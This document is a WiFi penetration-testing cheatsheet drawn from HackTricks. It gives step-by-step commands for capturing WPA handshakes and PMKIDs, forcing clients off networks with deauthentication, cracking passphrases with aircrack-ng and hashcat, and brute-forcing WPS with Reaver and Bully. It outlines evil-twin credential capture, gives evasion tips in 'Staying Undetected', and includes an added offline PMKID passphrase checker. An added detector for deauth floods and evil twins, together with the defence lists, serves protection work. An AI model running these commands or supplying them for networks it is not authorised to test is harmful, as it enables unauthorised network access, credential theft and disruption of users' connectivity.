WiFi Hacking Cheatsheet

https://book.hacktricks.wiki/en/generic-methodologies-and-resources/pentesting-wifi/index.html

Core Concepts

  • 802.11: The IEEE standard for wireless local area networks (WLANs).
  • SSID (Service Set Identifier): The name of the wireless network.
  • BSSID (Basic Service Set Identifier): The MAC address of the wireless access point (AP).
  • Beacon Frames: Frames broadcast by APs to announce their presence and parameters.
  • Probe Requests: Frames sent by clients to discover available networks.
  • Probe Responses: Frames sent by APs in response to probe requests.
  • Authentication: The process of verifying the identity of a client.
  • Association: The process of a client joining a wireless network.
  • 4-Way Handshake: The process used to generate encryption keys in WPA/WPA2-PSK.
  • PMK (Pairwise Master Key): The master key used in WPA/WPA2-PSK, derived from the passphrase.
  • PTK (Pairwise Transient Key): The encryption key used for a specific session, derived from the PMK during the 4-way handshake.
  • MIC (Message Integrity Check): A cryptographic checksum used to verify the integrity of data.
  • Deauthentication Attack: Sending deauthentication frames to disconnect clients from an AP.
  • Monitor Mode: A special mode that allows a wireless adapter to capture all wireless traffic within range, not just traffic to or from its own MAC address.
  • Packet Injection: The ability to transmit arbitrary wireless packets.

Essential Tools

  • Aircrack-ng Suite:
    • airmon-ng: Manages wireless interface modes (monitor mode, managed mode).
    • airodump-ng: Captures wireless traffic and displays information about APs and clients.
    • aireplay-ng: Injects wireless packets (used for deauthentication attacks, etc.).
    • aircrack-ng: Cracks WPA/WPA2-PSK keys from captured handshakes.
    • packetforge-ng: Creates custom packets.
    • airdecap-ng: Decrypts WPA/WPA2 traffic.
  • Reaver: Automates WPS brute-force attacks.
  • Bully: Another WPS brute-force tool, considered faster and more feature-rich than Reaver in some cases.
  • Wireshark: A powerful network protocol analyzer used for examining captured traffic.
  • tshark: The command-line version of Wireshark.
  • hcxdumptool: A tool for capturing WPA/WPA2 authentication handshakes and PMKIDs.
  • hcxtools: A set of tools for converting and manipulating captured handshake data.
  • Hashcat: A fast and versatile password cracking tool that can be used to crack WPA/WPA2 keys (GPU acceleration recommended).
  • John the Ripper: Another popular password cracking tool that supports WPA/WPA2 cracking.

General Workflow for WPA/WPA2-PSK Cracking

  1. Information Gathering:
    • Identify Target Network: Use airodump-ng or a similar tool to discover the target network's SSID, BSSID, channel, and encryption type.
  2. Put Wireless Interface into Monitor Mode:
    sudo airmon-ng check kill # Kill processes that might interfere
    sudo airmon-ng start wlan0
    # OR
    sudo iwconfig wlan0 mode monitor
    sudo ifconfig wlan0 up
    • Replace wlan0 with the name of your wireless interface. This often results in a new interface being created like wlan0mon or mon0. Use that interface going forward.
  3. Capture Wireless Traffic:
    sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_file> <interface>
    • -c <channel>: The channel the target AP is on.
    • --bssid <BSSID>: The MAC address of the target AP.
    • -w <output_file>: The prefix for the output files (capture file will be output_file-01.cap).
    • <interface>: Your wireless interface in monitor mode (e.g., wlan0mon).
  4. Capture the 4-Way Handshake:
    • Wait for a Client to Connect: You can wait for a legitimate client to connect to the target AP.
    • Deauthenticate a Client (Faster): Use aireplay-ng to send deauthentication packets to force a client to reconnect, capturing the handshake.
      sudo aireplay-ng -0 2 -a <BSSID> -c <client_mac> <interface>
      • -0 2: Sends 2 deauthentication packets.
      • -a <BSSID>: The MAC address of the target AP.
      • -c <client_mac>: The MAC address of a client connected to the AP (visible in the airodump-ng output). If omitted, a broadcast deauthentication is sent, which is less effective.
    • Monitor airodump-ng Output: Look for the message "WPA handshake: <BSSID>" in the top right corner, indicating a successful handshake capture.
  5. Stop the Capture: Press Ctrl+C in the airodump-ng terminal.
  6. Crack the Handshake:
    • Using aircrack-ng (CPU-based):
      aircrack-ng <output_file>-01.cap -w <wordlist>
      • <output_file>-01.cap: The capture file containing the handshake.
      • -w <wordlist>: The path to your password wordlist.
    • Using hashcat (GPU-based, faster):
      1. Convert the capture file to a hashcat-compatible format (using hcxpcapngtool from hcxtools or cap2hccapx from the old hashcat-utils package):
        • hcxpcapngtool -o hash.hc22000 capture.cap
        • Or if you still have cap2hccapx: cap2hccapx capture.cap hash.hccapx
      2. Run hashcat:
        hashcat -m 22000 hash.hc22000 <wordlist>
        • -m 22000: Specifies the hash mode for WPA/WPA2 (use the new 22000 format).
      3. If you only have an older .hccapx file (a deprecated format, superseded by .hc22000):
        hashcat -m 2500 hash.hccapx <wordlist>

Cracking WPA/WPA2 with PMKID

  • PMKID (Pairwise Master Key Identifier): A value derived from the PMK that can be used to crack the WPA/WPA2 passphrase without needing the 4-way handshake.
  • Capturing the PMKID:
    • Use hcxdumptool:
      sudo hcxdumptool -i <interface> -o capture.pcapng --enable_status=1
      • -i: Interface
      • -o: Output file
      • --enable_status=1: Shows the status of the attack. 1 enables real-time output of PMKID captures. (Newer hcxdumptool releases have renamed several options; check hcxdumptool --help for your version.)
    • hcxdumptool sends an association request to the AP. An AP that supports PMKID caching answers with the first EAPOL frame of the 4-way handshake, whose RSN information element carries the PMKID.
  • Converting to Hashcat Format:
    • Use hcxpcapngtool from hcxtools:
      hcxpcapngtool -o hash.hc22000 capture.pcapng
  • Cracking with Hashcat:
    hashcat -m 22000 hash.hc22000 <wordlist>
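The following is an added example, not part of the original cheatsheet: it writes out the PMK and PMKID derivation from the Core Concepts section and this PMKID section so the cost model behind offline cracking is visible. Every candidate passphrase costs 4096 HMAC-SHA1 rounds and nothing else, which is why passphrase entropy is the only real defense for WPA2-PSK. The MAC addresses and candidate list are constructed; the passphrase/SSID pair "password"/"IEEE" is the IEEE 802.11 Annex test vector.

```python
# Added example: WPA/WPA2-PSK key derivation (IEEE 802.11).
#   PMK   = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
#   PMKID = HMAC-SHA1(PMK, "PMK Name" || BSSID || client MAC)[0:16]
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK as defined for WPA/WPA2-PSK; the SSID is the PBKDF2 salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID as carried in the RSN IE of EAPOL message 1 (what hcxdumptool captures)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def find_passphrase(pmkid: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, candidates):
    """Offline check of candidate passphrases against one captured PMKID.

    This is the per-guess work hashcat mode 22000 performs: one PBKDF2 plus one
    HMAC per candidate. Returns the matching passphrase or None.
    """
    for cand in candidates:
        guess = compute_pmkid(derive_pmk(cand, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, pmkid):
            return cand
    return None


# Constructed demo values (made-up MACs; "password"/"IEEE" is the 802.11 test vector).
AP_MAC = bytes.fromhex("aabbccddee01")
STA_MAC = bytes.fromhex("001122334455")

if __name__ == "__main__":
    captured = compute_pmkid(derive_pmk("password", "IEEE"), AP_MAC, STA_MAC)
    print("PMK :", derive_pmk("password", "IEEE").hex())
    print("hit :", find_passphrase(captured, "IEEE", AP_MAC, STA_MAC, ["letmein", "password"]))
```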

WPS Attacks

  • WPS (Wi-Fi Protected Setup): A simplified setup process for wireless networks that is often vulnerable to brute-force attacks.
  • Reaver:
    sudo reaver -i <interface> -b <BSSID> -c <channel> -vv -K 1
    • -i <interface>: Your wireless interface in monitor mode.
    • -b <BSSID>: The MAC address of the target AP.
    • -c <channel>: The channel the target AP is on.
    • -vv: Very verbose output.
    • -K 1: Use Pixie Dust attack in addition to the standard attack.
    • Note: Reaver can take a long time (hours or even days) to complete.
  • Bully:
    sudo bully -b <BSSID> -c <channel> -B <interface>
    • -b <BSSID>: The MAC address of the target AP.
    • -c <channel>: The channel the target AP is on.
    • -B (--bruteforce): Also brute-force the WPS PIN checksum digit instead of computing it; slower, use with caution.
    • <interface>: Your wireless interface in monitor mode.
  • Pixie Dust Attack:
    • An offline WPS attack that exploits a weakness in some APs' random number generation.
    • Use the -K option with reaver or the appropriate option in other tools.

Evil Twin Attacks

  • Concept: Creating a rogue AP with the same SSID as a legitimate network to trick clients into connecting to it.
  • Tools:
    • airbase-ng (part of Aircrack-ng)
    • hostapd
    • dnsmasq
    • Specialized tools like wifiphisher and wifipumpkin
  • Steps (Simplified):
    1. Create a rogue AP with the same SSID as the target network (and potentially the same BSSID if you can spoof it).
    2. Deauthenticate clients from the legitimate AP to encourage them to connect to the evil twin.
    3. Capture credentials or other sensitive information from clients that connect to the evil twin.
    4. Potentially forward traffic to the internet to avoid suspicion.
  • Defenses:
    • 802.11w (Protected Management Frames): Helps protect against deauthentication attacks.
    • VPNs: Encrypt all traffic, even on untrusted networks.
    • Certificate Validation/Pinning: On 802.1X networks, configure clients to verify the authentication server's certificate so they refuse to authenticate to a rogue AP.
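As an added example, not part of the original cheatsheet, here is a minimal WIDS-style detector for the two signals the Evil Twin steps above produce: a burst of deauthentication frames against a legitimate BSSID, and beacons advertising a known SSID from a BSSID that is not in the inventory. The frame records, the KNOWN_APS inventory and the thresholds are constructed for the demo; a real deployment would feed records from a monitor-mode capture.

```python
# Added example: flag deauth floods and evil-twin beacons from management-frame records.
from collections import defaultdict, deque

KNOWN_APS = {"CorpWiFi": {"aa:bb:cc:dd:ee:01"}}  # assumed inventory: SSID -> legitimate BSSIDs
DEAUTH_THRESHOLD = 5       # deauth frames inside one window that count as a flood
WINDOW_SECONDS = 2.0       # sliding window length


def analyze(frames):
    """Return alert strings for frame records given in time order.

    Each record is a dict with at least ts (seconds), subtype and bssid;
    beacons also carry ssid. Each BSSID is reported at most once per condition.
    """
    alerts = []
    deauth_times = defaultdict(deque)   # bssid -> deauth timestamps inside the window
    flooded, twins = set(), set()
    for f in frames:
        if f["subtype"] == "deauth":
            q = deauth_times[f["bssid"]]
            q.append(f["ts"])
            while q and f["ts"] - q[0] > WINDOW_SECONDS:
                q.popleft()                 # drop frames that fell out of the window
            if len(q) >= DEAUTH_THRESHOLD and f["bssid"] not in flooded:
                flooded.add(f["bssid"])
                alerts.append(f"deauth flood against {f['bssid']} "
                              f"({len(q)} frames in {WINDOW_SECONDS}s); 802.11w would reject these")
        elif f["subtype"] == "beacon":
            legit = KNOWN_APS.get(f["ssid"])
            if legit is not None and f["bssid"] not in legit and f["bssid"] not in twins:
                twins.add(f["bssid"])
                alerts.append(f"possible evil twin: SSID {f['ssid']!r} from unknown BSSID {f['bssid']}")
    return alerts


# Constructed sample: six deauths in 0.5 s against the real AP, then a rogue and a legitimate beacon.
SAMPLE_FRAMES = (
    [{"ts": 10.0 + i * 0.1, "subtype": "deauth", "bssid": "aa:bb:cc:dd:ee:01",
      "dst": "ff:ff:ff:ff:ff:ff", "reason": 7} for i in range(6)]
    + [{"ts": 11.0, "subtype": "beacon", "bssid": "de:ad:be:ef:00:01", "ssid": "CorpWiFi"},
       {"ts": 11.1, "subtype": "beacon", "bssid": "aa:bb:cc:dd:ee:01", "ssid": "CorpWiFi"}]
)

if __name__ == "__main__":
    for alert in analyze(SAMPLE_FRAMES):
        print("ALERT:", alert)
```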

General Procedures and Best Practices

  • Planning and Reconnaissance:
    • Identify your target network(s).
    • Gather information about the target APs (SSID, BSSID, channel, encryption type, WPS status).
    • Use tools like airodump-ng, Kismet, or smartphone apps to passively scan for wireless networks.
  • Choosing the Right Attack:
    • WPA/WPA2-PSK: 4-way handshake capture and offline cracking or PMKID attack.
    • WPS: Brute-force attack with reaver or bully (if WPS is enabled and vulnerable).
    • Evil Twin: If the target network is open or uses weak encryption, or if you need to capture credentials directly.
  • Optimizing Cracking Speed:
    • GPU Acceleration: Use hashcat with a powerful GPU for faster cracking.
    • Good Wordlists: Use comprehensive and well-crafted wordlists.
    • Rules: Use rules with hashcat or John the Ripper to generate variations of passwords from the wordlist.
  • Ethical Considerations:
    • Always obtain explicit, written permission before conducting any wireless security testing.
    • Be aware of the legal implications of unauthorized access to wireless networks.
    • Report vulnerabilities responsibly to the network owner.
  • Staying Undetected:
    • MAC Address Spoofing: Change your MAC address to avoid being easily identified.
    • Low and Slow: Avoid aggressive scanning or brute-force attempts that could trigger alarms.
    • Don't Connect to the Target Network: If possible, avoid directly connecting to the target network during the attack.
  • Defending Against Wireless Attacks:
    • Strong Passphrases: Use long, complex, and unique passphrases for WPA/WPA2-PSK.
    • Disable WPS: Disable WPS if it's not absolutely necessary.
    • Enable WPA3: Use WPA3 if your devices support it, as it provides better security than WPA2.
    • MAC Filtering: While not foolproof, MAC filtering can add an extra layer of security.
    • Wireless Intrusion Detection System (WIDS): Monitor for suspicious wireless activity.
    • Client Isolation: Prevent wireless clients from communicating with each other.
    • Regular Security Audits: Periodically assess the security of your wireless network.
  • Using Virtual Machines: Perform Wi-Fi hacking activities within a virtual machine (VM) to isolate the testing environment from your host operating system. Ensure your wireless adapter is properly passed through to the VM.

Advanced Techniques

  • WPA/WPA2 Enterprise Attacks:
    • Targeting enterprise wireless networks that use 802.1X authentication (e.g., with a RADIUS server).
    • Techniques include capturing and cracking MSCHAPv2 handshakes, exploiting vulnerabilities in the authentication server, and setting up rogue authentication servers.
  • Rogue Access Point Attacks:
    • Deploying a rogue AP to capture user credentials or launch man-in-the-middle attacks.
  • Karma Attacks:
    • A type of rogue AP attack where the AP responds to probe requests from clients for any SSID, potentially tricking clients into connecting even if they haven't previously connected to that network.
  • Known Beacons Attack: An attack that can force a device to connect to a fake AP even if the device is configured to connect to a specific, known network.
  • 802.11 Protocol Exploitation:
    • Exploiting vulnerabilities in the 802.11 protocol itself, rather than just the encryption or authentication mechanisms.
  • Jamming:
    • Intentionally interfering with wireless signals to disrupt communications (denial-of-service).